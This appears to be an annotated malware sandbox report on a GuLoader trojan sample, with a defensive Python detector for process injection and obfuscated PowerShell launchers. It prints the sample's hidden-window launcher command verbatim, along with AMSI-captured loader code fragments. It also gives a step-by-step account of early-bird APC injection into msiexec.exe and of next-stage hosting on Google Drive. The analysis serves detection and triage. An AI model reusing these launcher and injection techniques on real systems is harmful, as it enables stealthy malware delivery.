      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | File written: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\Meir.ini
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: GyGE2VaBFL.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ws\System.Core.pdb source: powershell.exe, 00000001.00000002.1675183518.00000000088C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.1671040347.000000000771E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: Yara match | File source: 00000001.00000002.1676887865.000000000ACA8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000A.00000002.2415295376.0000000005518000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Hamper $Svesketrters $Henstilles), (Genethliacal @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Overfladebehandledes = [AppDomain]::CurrentDomain.GetAssem
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Udnvnelsernes)), $Reexcavatedlmengres).DefineDynamicModule($mindes, $false).DefineType($Hyperridiculously, $Sidonia28, [System.Multica
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04A5A492 pushfd ; ret 1_2_04A5A4A1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04A5E9F8 push eax; mov dword ptr [esp], edx 1_2_04A5EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences; the value matches [TimeSpan]::MaxValue expressed in milliseconds, i.e. an unbounded wait)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6331
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3379
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7984 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7788 | Thread sleep time: -100000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Code function: 0_2_00406448 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Code function: 0_2_004027A1 FindFirstFileA
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1666170853.0000000005563000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1666170853.0000000005563000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\
Source: powershell.exe, 00000001.00000002.1666170853.0000000005563000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\
Source: svchost.exe, 00000003.00000002.2416713089.0000017F88255000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2415741764.0000017F82E2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 0000000A.00000002.2414604219.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Caveat on the strings above: they are weak evidence of a virtualization check. The *-NetEventVmNetworkAdapter names are cmdlets of the NetEventPacketCapture module that ships with Windows, and they land in PowerShell's module analysis cache on any host where that module is present; "Hyper-V RAW" is the Winsock catalog name of the AF_HYPERV provider and shows up in the memory of ordinary processes that have loaded Winsock. The stronger anti-analysis indicators in this section are the sleep-based delays listed above and the DebugPort query on msiexec.exe listed below.
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | API call chain: ExitProcess graph end node (graph_0-3250)
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | API call chain: ExitProcess graph end node (graph_0-3415)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_04A57810 LdrInitializeThunk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3F40000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Read together, these four entries are the "early bird" injection sequence named in the signature list: powershell.exe starts msiexec.exe in a suspended state, writes the payload into it at base 0x3F40000, queues an APC on the new process's initial thread, and resumes it, so the payload runs when that APC is delivered during thread start-up, before msiexec's own entry point executes. The target is an unmodified Windows binary launched with no MSI arguments, which is why the "Msiexec Initiated Connection" Sigma rule in the signature list is the practical detection rather than the process name.
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$appassionataens178=get-content -raw 'c:\users\user\appdata\local\afsindigstes\physitheism\altingsmedlemmet\ricinoleic.eks';$desquamative=$appassionataens178.substring(52965,3);.$desquamative($appassionataens178) " (listed twice in the report)
The launcher reads the whole dropped file ricinoleic.eks into one string, takes the three characters at offset 52965 of that string as a command name, and invokes that command with the entire file contents as its argument. The cmdlet that actually interprets the script therefore never appears on the command line, and the file is at least 52968 characters long; c:\users\user\appdata\local\afsindigstes\physitheism\altingsmedlemmet\ricinoleic.eks is the artifact to collect first in triage, since it carries both the command name and the script body.
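The following Python is an added example, not part of the Joe Sandbox report or of GuLoader: it parses behavior lines of the shape "Source: <process> <action>: <details>" and (1) flags a source/target pair that created a process, wrote its memory and queued an APC into it, i.e. the early bird chain listed above, and (2) dissects a PowerShell launcher command line for the read-file / substring-as-command / variable-invocation pattern shown in the last entry. The line grammar and the regular expressions are my assumptions about the report format; the sample lines are copied from the entries above plus one constructed benign control line.

```python
"""Added example (not from the report): early bird chain and PowerShell launcher detection."""
import re
from collections import defaultdict

# Constructed sample: the report's HIPS/PFW entries plus one benign control line (last).
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3F40000",
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"',
    r'''Source: C:\Users\user\Desktop\GyGE2VaBFL.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$appassionataens178=get-content -raw 'c:\users\user\appdata\local\afsindigstes\physitheism\altingsmedlemmet\ricinoleic.eks';$desquamative=$appassionataens178.substring(52965,3);.$desquamative($appassionataens178) "''',
    r"Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\notepad.exe notepad.exe",
]

# Assumed line grammar: "Source: <path-without-spaces> <action without colon>: <details>".
LINE_RE = re.compile(r"^Source:\s+(?P<source>\S+)\s+(?P<action>[^:]+?):\s*(?P<details>.*)$")
PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"]+')


def parse_line(line):
    """Split a behavior line into (source, action, details); None if it does not match."""
    m = LINE_RE.match(line.strip())
    return (m.group("source"), m.group("action").strip(), m.group("details")) if m else None


def first_path(text):
    """First Windows path in a details field (the injection target or the spawned image)."""
    m = PATH_RE.search(text)
    return m.group(0) if m else None


def detect_early_bird(lines):
    """Return sorted (source, target) pairs that show create + memory write + APC queue."""
    steps = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        source, action, details = parsed
        target = first_path(details)
        if not target:
            continue
        a = action.lower()
        if a.startswith("process created"):
            steps[(source, target)].add("create")
        if "memory written" in a:
            steps[(source, target)].add("write")
        if "apc" in a:
            steps[(source, target)].add("apc")
    return sorted(pair for pair, seen in steps.items() if {"create", "write", "apc"} <= seen)


def analyze_launcher(cmdline):
    """Score a PowerShell command line for the read-file / substring-as-command / invoke pattern."""
    f = {"hidden_window": False, "reads_file": False, "script_path": None,
         "substring": None, "variable_invocation": False}
    f["hidden_window"] = re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I) is not None
    m = re.search(r"get-content\s+-raw\s+'([^']+)'", cmdline, re.I)
    if m:
        f["reads_file"], f["script_path"] = True, m.group(1)
    elif re.search(r"\b(?:get-content|gc)\b", cmdline, re.I):
        f["reads_file"] = True
    m = re.search(r"\.substring\(\s*(\d+)\s*,\s*(\d+)\s*\)", cmdline, re.I)
    if m:
        f["substring"] = (int(m.group(1)), int(m.group(2)))
    # ".$name(" or "&$name(" invokes whatever string the variable holds as a command.
    f["variable_invocation"] = re.search(r"[.&]\s*\$\w+\s*\(", cmdline) is not None
    # Core of the technique: the command name is carved out of data at runtime and
    # invoked through a variable, so the interpreter cmdlet is absent from the command line.
    f["suspicious"] = f["substring"] is not None and f["variable_invocation"]
    return f


def detect_launchers(lines):
    """Find process-creation lines that spawn powershell.exe and score their command lines."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if not parsed or not parsed[1].lower().startswith("process created"):
            continue
        source, _, details = parsed
        target = first_path(details)
        if not target or not target.lower().endswith("powershell.exe"):
            continue
        findings = analyze_launcher(details[len(target):].strip())
        if findings["suspicious"]:
            hits.append((source, findings))
    return hits


if __name__ == "__main__":
    for src, tgt in detect_early_bird(SAMPLE_LINES):
        print(f"early bird chain: {src} -> {tgt}")
    for src, f in detect_launchers(SAMPLE_LINES):
        print(f"launcher from {src}: substring {f['substring']}, script {f['script_path']}, hidden={f['hidden_window']}")
```

analyze_launcher can be fed raw command lines from Sysmon event 1 or Windows event 4688 directly; the substring offset and the script path it returns are the two values worth putting into a ticket, because the command name itself is only recoverable from the dropped file.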
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (VolumeInformation) for the following paths, in first-seen order (occurrence count in parentheses where more than one):
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (14)
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
  C:\
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (10)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll (3)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (7)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (3)
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll (3)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll
  C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll
The mix of catalog files and module DLLs (BitLocker, SecureBoot, KDS, AppV, UEV, WER, AutoItX) is consistent with PowerShell's module auto-discovery walking every installed module while it resolves a command; it is the likely origin of the "Loading BitLocker PowerShell Module" signature and does not by itself show the script using any of those modules.
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk (3 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log (4 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db (3 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm (1 occurrence)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ (2 occurrences)
These paths are the BITS job store (qmgr.db and its ESE log and checkpoint files), so this svchost.exe is the BITS service host doing routine database access; the report shows no interaction between the sample and this process.
Source: C:\Users\user\Desktop\GyGE2VaBFL.exe | Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
This is the entry point of the outer executable. The OpenProcessToken / LookupPrivilegeValueA / AdjustTokenPrivileges / ExitWindowsEx tail is what triggers the "Contains functionality to shutdown / reboot the system" signature; it is the generic reboot-on-completion path of an installer stub (the whole sequence is consistent with an NSIS stub, the packaging commonly seen for GuLoader), not payload-specific behavior. The DeleteFileA / CopyFileA pair in the same function is consistent with the self-copy under Cideren231 reported in the antivirus section below.
MITRE ATT&CK matrix (flattened in the source; rebuilt here by tactic, columns of the original left to right; leading digits are the report's signature-count badges, kept as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 311 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 11 Masquerading; 41 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 311 Process Injection; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 121 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 3 File and Directory Discovery; 24 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Clipboard Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Antivirus detection, submitted file (Source | Detection | Scanner | Label):
GyGE2VaBFL.exe | 64% | Virustotal | (no label)
GyGE2VaBFL.exe | 47% | ReversingLabs | Win32.Trojan.GuLoader
Antivirus detection, dropped file (Source | Detection | Scanner | Label):
C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe | 64% | Virustotal | (no label)
C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe | 47% | ReversingLabs | Win32.Trojan.GuLoader
The dropped file carries the same ratios and label as the submitted file, consistent with the sample copying itself into the Cideren231 directory.
No Antivirus matches (the remaining three scan tables are empty)
Domain | IP | Active | Malicious | Reputation
drive.google.com | 216.58.206.78 | true | false | high
drive.usercontent.google.com | 142.250.185.193 | true | false | high
Both domains are referenced only from the memory of the injected msiexec.exe (see the URL table below). Because the next stage is hosted on Google Drive, domain and IP reputation stay "high" and nothing is flagged at the destination; detection has to key on the requesting process (msiexec.exe launched with no MSI arguments making an outbound TLS connection) rather than on the network indicators.
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
              high
URL | Source | Malicious | Reputation
https://drive.usercontent.google.com/k | msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmp | false | high
